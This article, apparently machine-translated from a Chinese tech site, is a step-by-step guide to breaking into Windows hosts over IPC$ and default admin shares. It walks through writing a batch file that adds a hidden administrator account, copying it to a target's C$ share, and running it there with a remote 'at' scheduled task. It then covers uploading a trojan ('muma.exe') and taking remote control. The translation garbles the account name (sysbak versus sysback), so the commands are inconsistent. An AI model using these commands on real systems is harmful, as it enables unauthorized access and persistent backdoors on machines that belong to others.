Shulou(Shulou.com)06/01 Report--

IPC$(Internet Process Connection) is a resource that shares a named pipe. It is a named pipe that is open for inter-process communication. By providing a trusted username and password, both parties of the connection can establish a secure channel and exchange encrypted data through this channel, thus realizing access to remote computers. IPC$is a new feature of NT/2000 that allows only one connection between two IPs at a time. NT/2000, while providing ipc$functionality, also turns on default sharing when the system is first installed, i.e. all logical shares (c$,d$,e$...) and system directory winnt or windows(admin$) sharing. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, led to a reduction in system security.

(1) In order to cooperate with IPC sharing work, Windows operating system (excluding Windows 98 series) after installation, automatically set the shared directory as: C disk, D disk, E disk, ADMIN directory (C:\WINNT\), etc., that is, ADMIN$, C$, D$, E$, etc., but note that these shares are hidden, only administrators can remotely operate them. Type "net share" command in MS-DOS to view native shared resources.

(2) Basic DOS commands

DIR command: List files in the current path, often used to see if the file you are looking for is under the path.

CD command: Enter the specified directory. For example, if you want to enter the CODE folder in the E disk, press the "CD CODE" command in E:\>.

Common net commands:

net user: System account class operation

localnet group: system group operations

net use: remote connection, mapping operation

net time: View remote host system time

cls command: clear screen command

netstart command:

(3) Establishing and disconnecting IPC$connections

Leave a backdoor account

1. Related knowledge

What is a BAT file?

BAT file is a file format in Windows system called batch file. Simply put, a series of DOS commands to be executed are written sequentially in a text file with the suffix BAT. Executing the BAT file with a mouse double click or DOS command is equivalent to executing a series of DOS commands.

2 What is a planned task?

For example, suppose you want to disinfect your computer at 10 a.m. tomorrow, but you have to go out at 10 a.m. tomorrow. What should you do? At this point, use the "scheduled task" function to make the computer automatically execute the antivirus program at 10 a.m. tomorrow. Scheduled tasks are a Windows feature that can be found in the Control Panel. In addition, it is possible to add scheduled tasks from the command line.

3. Related DOS commands

Copy command: copy a file to another place,"another place" can be the local computer directory, disk, or another host directory or disk.

At command: used to create planned tasks.

Net time command: Use to view the target computer's system time so you can specify time using scheduled tasks.

Net user command: used to manage accounts on the computer.

- View Account Command: net user

- Create an account command: net user name passwd /add

- Delete account command: net user name passwd /del

The localnet group command is used to manage workgroups.

2. Example: Creating a backdoor account

Step 1: Prepare the BAT file.

Open Notepad, type "net user sysbak 123456 /add" and "net localgroup administrators sysback /add" commands, write the command, and save the file as "hack.bat". These two commands are explained below.

Command 1: net user sysbak 123456 /add. This command means adding an account with the username sysback and password 123456.

Parameter Description:

"sysback": username

"123456": user's password

"/add": indicates adding an account

Command 2: net localgroup administrators sysback /add. This command means adding sysback to the administrators group.

Parameter Description:

"administrators": indicates an administrator group

"sysback": newly created username

"/add": indicates adding an account

Step 2: Establish an IPC$connection with the target host.

Use the command: Net use \ip\ipc$ /user: username Password

Step 3: Copy files to target host.

Use the command: copy FILE \IP\PATH

Parameter Description:

"FILE" indicates the local file name

"IP" is the IP address of the target host

"PATH" The path to save files

Open MS-DOS and type "copy d:\hack.bat \192.168.27.128\c$" command. After the copy command is successfully executed, the hack.bat file under disk D has been copied to disk C under disk 192.168.27.128. Alternatively, you can copy and paste hack.bat into the target host in the graphical interface.

Step 4: Schedule tasks to make the remote host execute the hack.bat file.

First type "net time \IP" to view the system time of the remote host, and then type "at \IP TIME COMMAND" to establish a scheduled task on the remote host.

Parameter Description:

IP: Destination host IP

TIME: Set the time for the scheduled task to be executed

COMMAND: The command to execute the planned task

Open MS-DOS and type the command "net time \192.168.27.128." Assuming that the target system time echoed is 13:33, then schedule tasks for the remote host based on that time. Type the command "at\192.168.27.128 13:45 c:\hack.bat," which means executing the hack.bat file on the target host's C drive at 13:45 p.m. After adding the scheduled tasks, disconnect IPC$using the command "net use * /del."

Step 5: Verify that the account has been successfully established. After waiting for some time, it is estimated that the remote host has executed the hack.bat file. Verify that the "sysback" account is successfully established by establishing an IPC$connection. Connection successful! The administrator account "sysback" has been successfully created.

Conclusion:

(1) Open Target IPC$:

First you need to get a shell that does not depend on ipc$, such as cmd extension of sql, telnet, ***. Of course, this shell must have admin privileges. Then you can open the target ipc$using the shell command net share ipc$. As you can see from the previous question, there are still many conditions for ipc$to be used. Make sure the relevant services are running, or start them if they are not (see the usage of the net command for details). Or not, then (such as a firewall, can not kill) suggest giving up.

(2) Mapping and accessing default sharing:

Use the command net use z: \target IP\c$ "password" /user:"username" to map the other party's c drive to your own z drive, and so on. If you have already established ipc$with the target, you can access it directly with IP + letter +$. For example, copy muma.exe

\IP\d$\path\muma.exe 。Or you can map it again, but without the username and password: net use y: \IP\d$. Then copy muma.exe y:\path\muma.exe. When the path contains spaces, the path must be fully referenced with "".

(2) After connecting IPC$:

You can successfully connect to ipc$using an administrator account, which means you can do in-depth "communication" with the other system. You can use a variety of command-line tools (such as pstools, Win2000SrvReskit, telnehack, etc.) to obtain target information, manage target processes and services, etc. If the target has default sharing enabled, you can upload *** and run it. You can also use tftp and ftp to upload. Tools like dwrcc, VNC, RemoteAdmin (***) also have direct screen control capabilities. If it is a 2000server, you can also consider opening the terminal service for convenient control.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.